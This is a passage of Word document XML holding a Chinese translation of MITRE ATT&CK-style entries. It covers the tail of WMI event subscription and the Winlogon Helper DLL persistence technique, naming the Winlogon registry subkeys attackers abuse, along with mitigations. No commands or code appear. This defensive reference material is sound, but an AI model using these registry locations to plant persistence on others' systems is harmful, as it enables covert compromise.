        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="572AD27D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防止管理员和特权账号在系统之间的凭据重叠。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="69697B7B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="632"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60A713CF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04AFDACC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>默认情况下，只允许管理员使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WMI</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>远程连接</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制允许连接的其他用户，或</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>禁止所有用户远程连接到</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WMI</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EB30071" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0424B1F7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECC0C14" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件订阅条目，将当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件订阅与每个主机的已知良好订阅记录进行比较。也可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sysinternals Autoruns</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等工具来检测是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旨在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>获得持久性的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>更改</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F80959" w14:textId="0D9774CA" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Winlogon</w:t>
      </w:r>
      <w:r w:rsidR="0020731C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Helper DLL</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="07EB9561" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A8B6A01" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1004</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="516E9DED" w14:textId="6CB442AB" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BAD66CA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="664D171E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="367CBB88" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，文件监控，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A331DE1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId92" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:t>CAPEC-579</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="460E39E6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Praetorian</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ACFFB62" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73CE553F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA935C4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Winlogon.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>组件，负责登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>注销时的操作以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Ctrl-Alt-Delete</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>触发的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>SAS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>（安全注意序列）。注册表项</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>用于管理支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Winlogon</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的其他帮助程序和功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F807EFC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对这些注册表项的恶意修改可能导致</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Winlogon</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载和执行恶意动态链接库和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或可执行文件。具体而言，已知以下子项可能容易被滥用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F948122" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EF1D67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF1D67">
        <w:t>Winlogon\Notify</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1D67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  - </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1D67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1D67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Winlogon</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1D67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件的通知包动态链接库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2ACB4B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EF1D67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF1D67">
        <w:t>Winlogon\Userinit</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1D67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  - </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1D67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1D67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>userinit.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1D67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即用户登录时执行的用户初始化程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C5E332" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EF1D67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF1D67">
        <w:t>Winlogon\Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1D67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  - </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1D67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1D67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>explorer.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1D67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即用户登录时执行的系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1D67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA9E52E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会利用这些功能重复执行恶意代码并建立持久性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CA04C1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00EF1D67" w14:paraId="0CD8BABE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3625414C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EF1D67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF1D67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4E46CAA3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EF1D67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF1D67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="635F68CD" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7180B13C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId93" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>执行预防</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="711C3D0F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用能够审核和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或阻止未知动态链接库的白名单工具来识别并阻止通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Winlogon</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>帮助程序进程执行的潜在恶意软件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="5B50C928" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="632"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E446028" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0029B6A7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制用户账号的权限，使得只有授权管理员才能更改</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Winlogon</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>帮助程序。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4541EEFB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D79E72E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A69AF1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
